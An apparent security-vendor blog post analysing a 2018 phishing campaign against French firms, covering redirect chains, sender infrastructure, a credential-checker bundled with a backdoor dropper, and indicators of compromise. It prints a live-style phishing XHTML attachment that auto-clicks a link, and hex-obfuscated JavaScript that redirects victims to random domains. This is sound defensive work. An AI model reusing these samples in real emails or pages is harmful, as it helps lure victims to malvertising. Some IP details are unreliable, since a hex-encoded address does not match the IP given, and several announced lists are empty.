We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.
The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.
The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document“, “preuves“, or “fact” which can be followed by underscore and 6 numbers. Here are some of the attachment names we have observed:
Here’s an example content of an XHTML attachment from 15th of November:
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta content="UTF-8" /> </head> <body onload='document.getElementById("_y").click();'> <h1> <a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a> </h1> </body> </html>
Evolution of the campaign
The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:
These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.
var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77", "\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77", "\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77", "\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77", "\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77", "\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77", "\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77", "\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77", "\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77", "\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77", "\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77", "\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77", "\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77", "\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77", "\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77", "\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77", "\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77", "\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77", "\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77", "\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77", "\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77", "\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77", "\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77", "\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77", "\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"]; var arr=[_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9,_0xa4d9]; var redir=arr[Math[_0xa4d9](Math[_0xa4d9]()* arr[_0xa4d9])]; window[_0xa4d9][_0xa4d9](_0xa4d9+ redir)
In the next iteration of evolution during November, we observed few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:
At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.
Few days later at 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents into their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.
The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.
The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case: 22.214.171.124.
The server behind the .pw domain appears to be a postfix email server listed already on multiple blacklists. For compromised email accounts used for sending out the phishing emails, they are always coming from .fr domains.
The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.
Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.
Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.
During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following
- “All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
- .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
- Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
- Error.txt – contains any errors
- Good.txt – verified results
- Ostatok.txt – Ostatok means “the rest” or “remainder”
Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails in 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.
But what caused them to ZIP up this tool along with the results to Virustotal?
When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.
Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.
This is a non-exhaustive list of indicators observed during the campaign.
2bv9npptni4u46knazx2.pw p95jadah5you6bf1dpgm.pw lho33cefy1g.pw mail-server-zpqn8wcphgj.pw http://piecejointe.pro/facture/redirect.php http://email-document-joint.pro/redir/ l45yvbz21a.website 95plb963jjhjxd.space sjvmrvovndqo2u.icu jeu0rgf5apd5337.site 126.96.36.199 - Email Server 188.8.131.52 - Email Server 184.108.40.206 - Email Server 220.127.116.11 - Web Server / Malware C2 18.104.22.168 Web Server / Malware C2 22.214.171.124 - Web Server 126.96.36.199 - Web Server 188.8.131.52 - Web Server 184.108.40.206 - Web Server 220.127.116.11 - Web Server 18.104.22.168
The following indicators have been observed but are benign and can cause false positives.